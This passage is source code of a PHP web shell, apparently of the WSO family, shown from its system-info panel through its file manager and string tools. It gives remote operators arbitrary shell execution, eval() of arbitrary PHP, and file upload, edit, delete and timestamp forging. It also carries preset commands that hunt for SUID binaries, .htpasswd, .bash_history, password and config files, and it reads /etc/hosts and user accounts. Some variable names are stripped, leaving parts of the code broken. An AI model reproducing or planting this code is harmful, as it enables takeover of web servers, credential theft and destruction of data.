                    if(which($))
                        $temp[] = $;
                showSecParam(\'Userful\', implode(\', \',$temp));
                $temp=array();
                foreach ($danger as $)
                    if(which($))
                        $temp[] = $;
                showSecParam(\'Danger\', implode(\', \',$temp));
                $temp=array();
                foreach ($downloaders as $)
                    if(which($))
                        $temp[] = $;
                showSecParam(\'Downloaders\', implode(\', \',$temp));
                echo \'<br/>\';
                showSecParam(\'HDD space\', ex(\'df -h\'));
                showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));
				showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));
            }
	} else {
		showSecParam(\'OS Version\',ex(\'ver\'));
		showSecParam(\'Account Settings\', iconv(\'CP866\', \'UTF-8\',ex(\'net accounts\')));
		showSecParam(\'User Accounts\', iconv(\'CP866\', \'UTF-8\',ex(\'net user\')));
	}
	echo \'</div>\';
	hardFooter();
}
function actionFilesTools() {
	if( isset($_POST[\'p1\']) )
		$_POST[\'p1\'] = urldecode($_POST[\'p1\']);
	if(@$_POST[\'p2\']==\'download\') {
		if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {
			ob_start("ob_gzhandler", 4096);
			header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));
			if (function_exists("mime_content_type")) {
				$type = @mime_content_type($_POST[\'p1\']);
				header("Content-Type: " . $type);
			} else
                header("Content-Type: application/octet-stream");
			$fp = @fopen($_POST[\'p1\'], "r");
			if($fp) {
				while(!@feof($fp))
					echo @fread($fp, 1024);
				fclose($fp);
			}
		}exit;
	}
	if( @$_POST[\'p2\'] == \'mkfile\' ) {
		if(!file_exists($_POST[\'p1\'])) {
			$fp = @fopen($_POST[\'p1\'], \'w\');
			if($fp) {
				$_POST[\'p2\'] = "edit";
				fclose($fp);
			}
		}
	}
	hardHeader();
	echo \'<h1>File tools</h1><div class=content>\';
	if( !file_exists(@$_POST[\'p1\']) ) {
		echo \'File not exists\';
		hardFooter();
		return;
	}
	$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));
	if(!$uid) {
		$uid[\'name\'] = @fileowner($_POST[\'p1\']);
		$gid[\'name\'] = @filegroup($_POST[\'p1\']);
	} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));
	echo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';
	echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';
	if( empty($_POST[\'p2\']) )
		$_POST[\'p2\'] = \'view\';
	if( is_file($_POST[\'p1\']) )
		$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\', \'Frame\');
	else
		$m = array(\'Chmod\', \'Rename\', \'Touch\');
	foreach($m as $v)
		echo \'<a href=# onclick="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',\'\'.strtolower($v).\'\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';
	echo \'<br><br>\';
	switch($_POST[\'p2\']) {
		case \'view\':
			echo \'<pre class=ml1>\';
			$fp = @fopen($_POST[\'p1\'], \'r\');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo \'</pre>\';
			break;
		case \'highlight\':
			if( @is_readable($_POST[\'p1\']) ) {
				echo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';
				$oRb = @highlight_file($_POST[\'p1\'],true);
				echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$oRb).\'</div>\';
			}
			break;
		case \'chmod\':
			if( !empty($_POST[\'p3\']) ) {
				$perms = 0;
				for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)
					$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));
				if(!@chmod($_POST[\'p1\'], $perms))
					echo \'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>\';
			}
			clearstatcache();
			echo \'<script>p3_="";</script><form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value="submit"></form>\';
			break;
		case \'edit\':
			if( !is_writable($_POST[\'p1\'])) {
				echo \'File isn\'t writeable\';
				break;
			}
			if( !empty($_POST[\'p3\']) ) {
				$time = @filemtime($_POST[\'p1\']);
				$_POST[\'p3\'] = substr($_POST[\'p3\'],1);
				$fp = @fopen($_POST[\'p1\'],"w");
				if($fp) {
					@fwrite($fp,$_POST[\'p3\']);
					@fclose($fp);
					echo \'Saved!<br><script>p3_="";</script>\';
					@touch($_POST[\'p1\'],$time,$time);
				}
			}
			echo \'<form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>\';
			$fp = @fopen($_POST[\'p1\'], \'r\');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo \'</textarea><input type=submit value="submit"></form>\';
			break;
		case \'hexdump\':
			$c = @file_get_contents($_POST[\'p1\']);
			$n = 0;
			$h = array(\'00000000<br>\',\'\',\'\');
			$len = strlen($c);
			for ($i=0; $i<$len; ++$i) {
				$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';
				switch ( ord($c[$i]) ) {
					case 0:  $h[2] .= \' \'; break;
					case 9:  $h[2] .= \' \'; break;
					case 10: $h[2] .= \' \'; break;
					case 13: $h[2] .= \' \'; break;
					default: $h[2] .= $c[$i]; break;
				}
				$n++;
				if ($n == 32) {
					$n = 0;
					if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}
					$h[1] .= \'<br>\';
					$h[2] .= "
";
				}
		 	}
			echo \'<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#060a10><pre>\'.$h[1].\'</pre></td><td bgcolor=#202832><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';
			break;
		case \'rename\':
			if( !empty($_POST[\'p3\']) ) {
				if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))
					echo \'Can\'t rename!<br>\';
				else
					die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');
			}
			echo \'<form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value="submit"></form>\';
			break;
		case \'touch\':
			if( !empty($_POST[\'p3\']) ) {
				$time = strtotime($_POST[\'p3\']);
				if($time) {
					if(!touch($_POST[\'p1\'],$time,$time))
						echo \'Fail!\';
					else
						echo \'Touched!\';
				} else echo \'Bad time format!\';
			}
			clearstatcache();
			echo \'<script>p3_="";</script><form onsubmit="g(null,null,\'\' . urlencode($_POST[\'p1\']) . \'\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value="submit"></form>\';
			break;
		/* () 12.2015 mitryz */
		case \'frame\':
			$frameSrc = substr(htmlspecialchars($GLOBALS[\'cwd\']), strlen(htmlspecialchars($_SERVER[\'DOCUMENT_ROOT\'])));
			if ($frameSrc[0] != \'/\')
				$frameSrc = \'/\' . $frameSrc;
			if ($frameSrc[strlen($frameSrc) - 1] != \'/\')
				$frameSrc = $frameSrc . \'/\';
			$frameSrc = $frameSrc . htmlspecialchars($_POST[\'p1\']);
			echo \'<iframe width="100%" height="900px" scrolling="no" src=\'.$frameSrc.\' onload="onload=height=contentDocument.body.scrollHeight"></iframe>\';
			break;
	}
	echo \'</div>\';
	hardFooter();
}
if($os == \'win\')
	$aliases = array(
		"List Directory" => "dir",
    	"Find index.php in current dir" => "dir /s /w /b index.php",
    	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
    	"Show active connections" => "netstat -an",
    	"Show running services" => "net start",
    	"User accounts" => "net user",
    	"Show computers" => "net view",
		"ARP Table" => "arp -a",
		"IP Configuration" => "ipconfig /all"
	);
else
	$aliases = array(
  		"List dir" => "ls -lha",
		"list file attributes on a Linux second extended file system" => "lsattr -va",
  		"show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
		"Find" => "",
  		"find all suid files" => "find / -type f -perm -04000 -ls",
  		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
  		"find all sgid files" => "find / -type f -perm -02000 -ls",
  		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  		"find config.inc.php files" => "find / -type f -name config.inc.php",
  		"find config* files" => "find / -type f -name \"config*\"",
  		"find config* files in current dir" => "find . -type f -name \"config*\"",
  		"find all writable folders and files" => "find / -perm -2 -ls",
  		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
  		"find all service.pwd files" => "find / -type f -name service.pwd",
  		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
  		"find all .htpasswd files" => "find / -type f -name .htpasswd",
  		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  		"find all .bash_history files" => "find / -type f -name .bash_history",
  		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
  		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
		"Locate" => "",
  		"locate httpd.conf files" => "locate httpd.conf",
		"locate vhosts.conf files" => "locate vhosts.conf",
		"locate proftpd.conf files" => "locate proftpd.conf",
		"locate psybnc.conf files" => "locate psybnc.conf",
		"locate my.conf files" => "locate my.conf",
		"locate admin.php files" =>"locate admin.php",
		"locate cfg.php files" => "locate cfg.php",
		"locate conf.php files" => "locate conf.php",
		"locate config.dat files" => "locate config.dat",
		"locate config.php files" => "locate config.php",
		"locate config.inc files" => "locate config.inc",
		"locate config.inc.php" => "locate config.inc.php",
		"locate config.default.php files" => "locate config.default.php",
		"locate config* files " => "locate config",
		"locate .conf files"=>"locate \'.conf\'",
		"locate .pwd files" => "locate \'.pwd\'",
		"locate .sql files" => "locate \'.sql\'",
		"locate .htpasswd files" => "locate \'.htpasswd\'",
		"locate .bash_history files" => "locate \'.bash_history\'",
		"locate .mysql_history files" => "locate \'.mysql_history\'",
		"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",
		"locate backup files" => "locate backup",
		"locate dump files" => "locate dump",
		"locate priv files" => "locate priv"
	);
function actionConsole() {
    if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {
        prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);
        $_POST[\'p1\'] .= \' 2>&1\';
    } elseif(!empty($_POST[\'p1\']))
        prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);
	if(isset($_POST[\'ajax\'])) {
		prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);
		ob_start();
		echo "d.cf.cmd.value=\'\';
";
		$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("
$ ".$_POST[\'p1\']."
".ex($_POST[\'p1\']),"

	\'"));
		if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match))	{
			if(@chdir($match[1])) {
				$GLOBALS[\'cwd\'] = @getcwd();
				echo "c_=\'".$GLOBALS[\'cwd\']."\';";
			}
		}
		echo "d.cf.output.value+=\'".$temp."\';";
		echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
		$temp = ob_get_clean();
		echo strlen($temp), "
", $temp;
		exit;
	}
    if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
		prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);
	hardHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array(\'\');
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push(\'\');
	cur = cmds.length-1;
}
</script>";
	echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>\';
	foreach($GLOBALS[\'aliases\'] as $n => $v) {
		if($v == \'\') {
			echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';
			continue;
		}
		echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';
	}
	echo \'</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>\';
	if(!empty($_POST[\'p1\'])) {
		echo htmlspecialchars("$ ".$_POST[\'p1\']."
".ex($_POST[\'p1\']));
	}
	echo \'</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';
	echo \'</form></div><script>d.cf.cmd.focus();</script>\';
	hardFooter();
}
function actionPhp() {
	if( isset($_POST[\'ajax\']) ) {
		$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;
		ob_start();
		eval($_POST[\'p1\']);
		$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"

	\\'")."\';
";
		echo strlen($temp), "
", $temp;
		exit;
	}
	hardHeader();
	if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) {
		echo \'<h1>PHP info</h1><div class=content>\';
		ob_start();
		phpinfo();
		$tmp = ob_get_clean();
		$tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);
		$tmp = preg_replace(\'!a:\w+ {.*}!msiU\',\'\',$tmp);
		$tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);
		$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);
		$tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);
		echo $tmp;
		echo \'</div><br>\';
	}
	if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
		$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;
		echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';
	echo \' <input type=checkbox name=ajax value=1 \'.($_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\';
	if(!empty($_POST[\'p1\'])) {
		ob_start();
		eval($_POST[\'p1\']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo \'</pre></div>\';
	hardFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE[\'f\']))
        $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);
	if(!empty($_POST[\'p1\'])) {
		switch($_POST[\'p1\']) {
			case \'uploadFile\':
				if ( is_array($_FILES[\'f\'][\'tmp_name\']) ) {
					foreach ( $_FILES[\'f\'][\'tmp_name\'] as $i => $tmpName ) {
                        if(!@move_uploaded_file($tmpName, $_FILES[\'f\'][\'name\'][$i])) {
                                echo "Can\'t upload file!";
							}
						}
					}
				break;
			case \'mkdir\':
				if(!@mkdir($_POST[\'p2\']))
					echo "Can\'t create new dir";
				break;
			case \'delete\':
				function deleteDir($path) {
					$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';
					$dh  = opendir($path);
					while ( ($ = readdir($dh) ) !== false) {
						$ = $path.$;
						if ( (basename($) == "..") || (basename($) == ".") )
							continue;
						$type = filetype($);
						if ($type == "dir")
							deleteDir($);
						else
							@unlink($);
					}
					closedir($dh);
					@rmdir($path);
				}
				if(is_array(@$_POST[\'f\']))
					foreach($_POST[\'f\'] as $f) {
                        if($f == \'..\')
                            continue;
						$f = urldecode($f);
						if(is_dir($f))
							deleteDir($f);
						else
							@unlink($f);
					}
				break;
			case \'paste\':
				if($_COOKIE[\'act\'] == \'copy\') {
					function copy_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != ".."))
									copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');
						} elseif(is_file($c.$s))
							@copy($c.$s, $d.$s);
					}
					foreach($_COOKIE[\'f\'] as $f)
						copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);
				} elseif($_COOKIE[\'act\'] == \'move\') {
					function move_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != ".."))
									copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');
						} elseif(@is_file($c.$s))
							@copy($c.$s, $d.$s);
					}
					foreach($_COOKIE[\'f\'] as $f)
						@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);
				} elseif($_COOKIE[\'act\'] == \'zip\') {
					if(class_exists(\'ZipArchive\')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST[\'p2\'], 1)) {
                            chdir($_COOKIE[\'c\']);
                            foreach($_COOKIE[\'f\'] as $f) {
                                if($f == \'..\')
                                    continue;
                                if(@is_file($_COOKIE[\'c\'].$f))
                                    $zip->addFile($_COOKIE[\'c\'].$f, $f);
                                elseif(@is_dir($_COOKIE[\'c\'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS[\'cwd\']);
                            $zip->close();
                        }
                    }
				} elseif($_COOKIE[\'act\'] == \'unzip\') {
					if(class_exists(\'ZipArchive\')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE[\'f\'] as $f) {
                            if($zip->open($_COOKIE[\'c\'].$f)) {
                                $zip->extractTo($GLOBALS[\'cwd\']);
                                $zip->close();
                            }
                        }
                    }
				} elseif($_COOKIE[\'act\'] == \'tar\') {
                    chdir($_COOKIE[\'c\']);
                    $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);
                    ex(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));
                    chdir($GLOBALS[\'cwd\']);
				}
				unset($_COOKIE[\'f\']);
                setcookie(\'f\', \'\', time() - 3600);
				break;
			default:
                if(!empty($_POST[\'p1\'])) {
					prototype(\'act\', $_POST[\'p1\']);
					prototype(\'f\', serialize(@$_POST[\'f\']));
					prototype(\'c\', @$_POST[\'c\']);
				}
				break;
		}
	}
    hardHeader();
	echo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';
	$dirContent = hardScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);
	if($dirContent === false) {	echo \'Can\'t open this folder!\';hardFooter(); return; }
	global $sort;
	$sort = array(\'name\', 1);
	if(!empty($_POST[\'p1\'])) {
		if(preg_match(\'!s_([A-z]+)_(\d{1})!\', $_POST[\'p1\'], $match))
			$sort = array($match[1], (int)$match[2]);
	}
echo "<script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == \'checkbox\')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")\'>Permissions</a></th><th>Actions</th></tr>";
	$dirs = $files = array();
	$n = count($dirContent);
	for($i=0;$i<$n;$i++) {
		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
		$tmp = array(\'name\' => $dirContent[$i],
					 \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],
					 \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),
					 \'perms\' => viewPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),
					 \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),
					 \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),
					 \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])
					);
		if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))
			$files[] = array_merge($tmp, array(\'type\' => \'file\'));
		elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))
			$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));
		elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&&($dirContent[$i] != "."))
			$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));
	}
	$GLOBALS[\'sort\'] = $sort;
	function cmp($a, $b) {
		if($GLOBALS[\'sort\'][0] != \'size\')
			return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);
		else
			return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);
	}
	usort($files, "cmp");
	usort($dirs, "cmp");
	$files = array_merge($dirs, $files);
	$l = 0;
	foreach($files as $f) {
		echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'view\')">\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\',\'chmod\')">\'.$f[\'perms\']
			.\'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'touch\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'frame\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'download\')">D</a>\':\'\').\'</td></tr>\';
		$l = $l?0:1;
	}
	echo "<tr id=fak><td colspan=7>
	<input type=hidden name=ne value=\'\'>
	<input type=hidden name=a value=\'FilesMan\'>
	<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>
	<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>
	<label><select name=\'p1\'>";
	if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))
        echo "<option value=\'paste\'> Paste</option>";
	echo "<option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";
    if(class_exists(\'ZipArchive\'))
        echo "<option value=\'zip\'>+ zip</option><option value=\'unzip\'>- zip</option>";
    echo "<option value=\'tar\'>+ tar.gz</option>";
    echo "</select></label>";
    if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))
        echo "&nbsp;file name: <input type=text name=p2 value=\'hard_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'>&nbsp;";
    echo "<input type=\'submit\' value=\'submit\' style=\'margin-left:10px\'></td></tr></form></table></div>";
	hardFooter();
}
function actionStringTools() {
	if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}
	if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
	if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}
	if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}
	$stringTools = array(
		\'Base64 encode\' => \'base64_encode\',
		\'Base64 decode\' => \'base64_decode\',
		\'Url encode\' => \'urlencode\',
		\'Url decode\' => \'urldecode\',
		\'Full urlencode\' => \'full_urlencode\',
		\'md5 hash\' => \'md5\',
		\'sha1 hash\' => \'sha1\',
		\'crypt\' => \'crypt\',
		\'CRC32\' => \'crc32\',
		\'ASCII to HEX\' => \'ascii2hex\',
		\'HEX to ASCII\' => \'hex2ascii\',
		\'HEX to DEC\' => \'hexdec\',
		\'HEX to BIN\' => \'hex2bin\',
		\'DEC to HEX\' => \'dechex\',
		\'DEC to BIN\' => \'decbin\',
		\'BIN to HEX\' => \'binhex\',
		\'BIN to DEC\' => \'bindec\',
		\'String to lower case\' => \'strtolower\',
		\'String to upper case\' => \'strtoupper\',
		\'Htmlspecialchars\' => \'htmlspecialchars\',
		\'String length\' => \'strlen\',
	);
	if(isset($_POST[\'ajax\'])) {
		prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);
		ob_start();
		if(in_array($_POST[\'p1\'], $stringTools))
			echo $_POST[\'p1\']($_POST[\'p2\']);
		$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"

	\\'")."\';
";
		echo strlen($temp), "
", $temp;
		exit;
	}
    if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
		prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);
	hardHeader();
	echo \'<h1>String conversions</h1><div class=content>\';
	echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><label><select name=\'selectTool\'>";
	foreach($stringTools as $k => $v)
